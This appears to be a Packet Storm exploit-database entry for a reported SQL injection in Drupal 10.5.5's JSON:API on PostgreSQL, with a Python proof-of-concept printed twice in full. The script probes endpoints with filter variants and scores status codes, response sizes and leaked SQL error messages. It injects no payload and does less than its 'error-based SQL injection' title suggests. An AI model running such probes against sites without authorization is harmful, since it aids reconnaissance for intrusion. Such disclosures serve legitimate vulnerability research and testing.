9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
This code demonstrates a research-oriented implementation targeting a reported SQL injection condition in Drupal JSON:API endpoints backed by PostgreSQL...
Basic Information
ID
PACKETSTORM:223236
Published
Jun 11, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : Drupal core 10.5.5 JSON:API PostgreSQL Error-Based SQL Injection |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 147.0.4 (64-bit) |
| # Vendor : https://www.drupal.org/project/drupal |
==================================================================================================================================
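[+] Summary : This proof-of-concept script probes Drupal JSON:API endpoints backed by PostgreSQL for a reported SQL injection condition: it sends a baseline filter query plus several filter variants, then scores the responses for status-code changes, body-size differences, and leaked database error messages.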
[+] POC :
#!/usr/bin/env python3
import requests
import re
import sys
from urllib.parse import urlencode
class DrupalJSONAPIAuditor:
    """Probe a Drupal JSON:API collection URL for leaked database errors.

    The auditor sends one baseline filter query and several variants that use
    different filter identifiers with the ``IN`` operator.  Each variant is
    compared with the baseline (status code, body size, error keywords) and a
    heuristic exposure score is printed.
    """

    # Regular expressions searched case-insensitively in response bodies.
    SQL_ERROR_PATTERNS = [
        r"postgresql",
        r"syntax error",
        r"sqlstate",
        r"invalid input syntax",
        r"query failed",
        r"database error",
        r"exception",
        r"stack trace",
        r"uncaught",
        r"warning:",
        r"fatal error",
        r"pdoexception",
        r"doctrine",
        r"sql error",
    ]

    def __init__(self, url):
        """Remember the target URL and the JSON:API media-type headers.

        Args:
            url: Endpoint to query, e.g. ``http://host/jsonapi/node/article``.
        """
        self.url = url
        self.headers = {
            "Accept": "application/vnd.api+json",
            "Content-Type": "application/vnd.api+json",
        }

    def send_request(self, params):
        """Send a GET request with ``params`` as the query string.

        Args:
            params: Mapping of query-string keys to values.

        Returns:
            ``{"status": int, "length": int, "body": str}`` on success, or
            ``{"error": str}`` when the request could not be completed.
        """
        try:
            response = requests.get(
                self.url,
                params=params,
                headers=self.headers,
                timeout=10,
            )
        except requests.RequestException as exc:
            # Only transport/protocol failures are expected here; anything
            # else is a programming error and should surface normally.
            return {"error": str(exc)}

        body = response.text
        return {
            "status": response.status_code,
            "length": len(body),
            "body": body,
        }

    def baseline(self):
        """Send the reference query (``title = example``) and return its result."""
        params = {
            "filter[test][condition][path]": "title",
            "filter[test][condition][operator]": "=",
            "filter[test][condition][value]": "example",
        }
        return self.send_request(params)

    def mutated_filters(self):
        """Send one ``IN`` filter query per candidate filter identifier.

        Returns:
            A list of ``(name, result)`` tuples, where ``result`` has the shape
            returned by :meth:`send_request`.
        """
        candidates = [
            "unexpected",
            "nested",
            "long_key_name_" * 5,
            "special_chars",
            "duplicate",
        ]
        tests = []
        for name in candidates:
            params = {
                f"filter[{name}][condition][path]": "title",
                f"filter[{name}][condition][operator]": "IN",
                f"filter[{name}][condition][value][0]": "example",
            }
            tests.append((name, self.send_request(params)))
        return tests

    def detect_error_leakage(self, body):
        """Return the patterns from ``SQL_ERROR_PATTERNS`` found in ``body``.

        Args:
            body: Response text to scan; an empty or ``None`` body yields ``[]``.

        Returns:
            Matching pattern strings, in ``SQL_ERROR_PATTERNS`` order.
        """
        if not body:
            return []
        return [
            pattern
            for pattern in self.SQL_ERROR_PATTERNS
            if re.search(pattern, body, re.IGNORECASE)
        ]

    def compare_response(self, base, other):
        """Compare two successful results from :meth:`send_request`.

        Both arguments must contain ``"status"`` and ``"length"`` keys (i.e.
        neither may be an ``{"error": ...}`` result).

        Returns:
            ``{"status_change": bool, "size_delta": int}``.
        """
        return {
            "status_change": base["status"] != other["status"],
            "size_delta": abs(base["length"] - other["length"]),
        }

    def confidence(self, score):
        """Map a numeric score to ``"HIGH"`` (>= 5), ``"MEDIUM"`` (>= 2) or ``"LOW"``."""
        if score >= 5:
            return "HIGH"
        if score >= 2:
            return "MEDIUM"
        return "LOW"

    def run(self):
        """Run the baseline and all variants, printing per-test details and a summary.

        Scoring: one point per matched error pattern, one point for a status
        code that differs from the baseline, and one point for a body-size
        difference above 100 characters.
        """
        print(f"[*] Auditing: {self.url}")

        base = self.baseline()
        if "error" in base:
            # Without a baseline there is nothing to compare against.
            print(f"[!] Request failed: {base['error']}")
            return

        score = 0
        print(f"[*] Baseline: {base['status']} ({base['length']} bytes)")

        for name, result in self.mutated_filters():
            if "error" in result:
                # Report the failure instead of silently dropping the test.
                print(f"\n[{name}]")
                print(f"request failed: {result['error']}")
                continue

            diff = self.compare_response(base, result)
            leaks = self.detect_error_leakage(result["body"])

            print(f"\n[{name}]")
            print(f"status change: {diff['status_change']}")
            print(f"size delta: {diff['size_delta']}")

            if leaks:
                print("error indicators:")
                for indicator in leaks:
                    print(f" -> {indicator}")
                score += len(leaks)
            if diff["status_change"]:
                score += 1
            if diff["size_delta"] > 100:
                score += 1

        print("\n==== SUMMARY ====")
        print(f"Exposure Score: {score}")
        print(f"Confidence: {self.confidence(score)}")
if __name__ == "__main__":
    # Exactly one positional argument is required: the JSON:API URL to audit.
    cli_args = sys.argv[1:]
    if len(cli_args) != 1:
        print(f"usage:\n{sys.argv[0]} http://host/jsonapi/node/article")
        sys.exit(1)

    DrupalJSONAPIAuditor(cli_args[0]).run()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : Drupal core 10.5.5 JSON:API PostgreSQL Error-Based SQL Injection |
| # Author : indoushka |
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 147.0.4 (64-bit) |
| # Vendor : https://www.drupal.org/project/drupal |
==================================================================================================================================
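[+] Summary : This proof-of-concept script probes Drupal JSON:API endpoints backed by PostgreSQL for a reported SQL injection condition: it sends a baseline filter query plus several filter variants, then scores the responses for status-code changes, body-size differences, and leaked database error messages.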
[+] POC :
#!/usr/bin/env python3
import requests
import re
import sys
from urllib.parse import urlencode
class DrupalJSONAPIAuditor:
    """Probe a Drupal JSON:API collection URL for leaked database errors.

    The auditor sends one baseline filter query and several variants that use
    different filter identifiers with the ``IN`` operator.  Each variant is
    compared with the baseline (status code, body size, error keywords) and a
    heuristic exposure score is printed.
    """

    # Regular expressions searched case-insensitively in response bodies.
    SQL_ERROR_PATTERNS = [
        r"postgresql",
        r"syntax error",
        r"sqlstate",
        r"invalid input syntax",
        r"query failed",
        r"database error",
        r"exception",
        r"stack trace",
        r"uncaught",
        r"warning:",
        r"fatal error",
        r"pdoexception",
        r"doctrine",
        r"sql error",
    ]

    def __init__(self, url):
        """Remember the target URL and the JSON:API media-type headers.

        Args:
            url: Endpoint to query, e.g. ``http://host/jsonapi/node/article``.
        """
        self.url = url
        self.headers = {
            "Accept": "application/vnd.api+json",
            "Content-Type": "application/vnd.api+json",
        }

    def send_request(self, params):
        """Send a GET request with ``params`` as the query string.

        Args:
            params: Mapping of query-string keys to values.

        Returns:
            ``{"status": int, "length": int, "body": str}`` on success, or
            ``{"error": str}`` when the request could not be completed.
        """
        try:
            response = requests.get(
                self.url,
                params=params,
                headers=self.headers,
                timeout=10,
            )
        except requests.RequestException as exc:
            # Only transport/protocol failures are expected here; anything
            # else is a programming error and should surface normally.
            return {"error": str(exc)}

        body = response.text
        return {
            "status": response.status_code,
            "length": len(body),
            "body": body,
        }

    def baseline(self):
        """Send the reference query (``title = example``) and return its result."""
        params = {
            "filter[test][condition][path]": "title",
            "filter[test][condition][operator]": "=",
            "filter[test][condition][value]": "example",
        }
        return self.send_request(params)

    def mutated_filters(self):
        """Send one ``IN`` filter query per candidate filter identifier.

        Returns:
            A list of ``(name, result)`` tuples, where ``result`` has the shape
            returned by :meth:`send_request`.
        """
        candidates = [
            "unexpected",
            "nested",
            "long_key_name_" * 5,
            "special_chars",
            "duplicate",
        ]
        tests = []
        for name in candidates:
            params = {
                f"filter[{name}][condition][path]": "title",
                f"filter[{name}][condition][operator]": "IN",
                f"filter[{name}][condition][value][0]": "example",
            }
            tests.append((name, self.send_request(params)))
        return tests

    def detect_error_leakage(self, body):
        """Return the patterns from ``SQL_ERROR_PATTERNS`` found in ``body``.

        Args:
            body: Response text to scan; an empty or ``None`` body yields ``[]``.

        Returns:
            Matching pattern strings, in ``SQL_ERROR_PATTERNS`` order.
        """
        if not body:
            return []
        return [
            pattern
            for pattern in self.SQL_ERROR_PATTERNS
            if re.search(pattern, body, re.IGNORECASE)
        ]

    def compare_response(self, base, other):
        """Compare two successful results from :meth:`send_request`.

        Both arguments must contain ``"status"`` and ``"length"`` keys (i.e.
        neither may be an ``{"error": ...}`` result).

        Returns:
            ``{"status_change": bool, "size_delta": int}``.
        """
        return {
            "status_change": base["status"] != other["status"],
            "size_delta": abs(base["length"] - other["length"]),
        }

    def confidence(self, score):
        """Map a numeric score to ``"HIGH"`` (>= 5), ``"MEDIUM"`` (>= 2) or ``"LOW"``."""
        if score >= 5:
            return "HIGH"
        if score >= 2:
            return "MEDIUM"
        return "LOW"

    def run(self):
        """Run the baseline and all variants, printing per-test details and a summary.

        Scoring: one point per matched error pattern, one point for a status
        code that differs from the baseline, and one point for a body-size
        difference above 100 characters.
        """
        print(f"[*] Auditing: {self.url}")

        base = self.baseline()
        if "error" in base:
            # Without a baseline there is nothing to compare against.
            print(f"[!] Request failed: {base['error']}")
            return

        score = 0
        print(f"[*] Baseline: {base['status']} ({base['length']} bytes)")

        for name, result in self.mutated_filters():
            if "error" in result:
                # Report the failure instead of silently dropping the test.
                print(f"\n[{name}]")
                print(f"request failed: {result['error']}")
                continue

            diff = self.compare_response(base, result)
            leaks = self.detect_error_leakage(result["body"])

            print(f"\n[{name}]")
            print(f"status change: {diff['status_change']}")
            print(f"size delta: {diff['size_delta']}")

            if leaks:
                print("error indicators:")
                for indicator in leaks:
                    print(f" -> {indicator}")
                score += len(leaks)
            if diff["status_change"]:
                score += 1
            if diff["size_delta"] > 100:
                score += 1

        print("\n==== SUMMARY ====")
        print(f"Exposure Score: {score}")
        print(f"Confidence: {self.confidence(score)}")
if __name__ == "__main__":
    # Exactly one positional argument is required: the JSON:API URL to audit.
    cli_args = sys.argv[1:]
    if len(cli_args) != 1:
        print(f"usage:\n{sys.argv[0]} http://host/jsonapi/node/article")
        sys.exit(1)

    DrupalJSONAPIAuditor(cli_args[0]).run()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================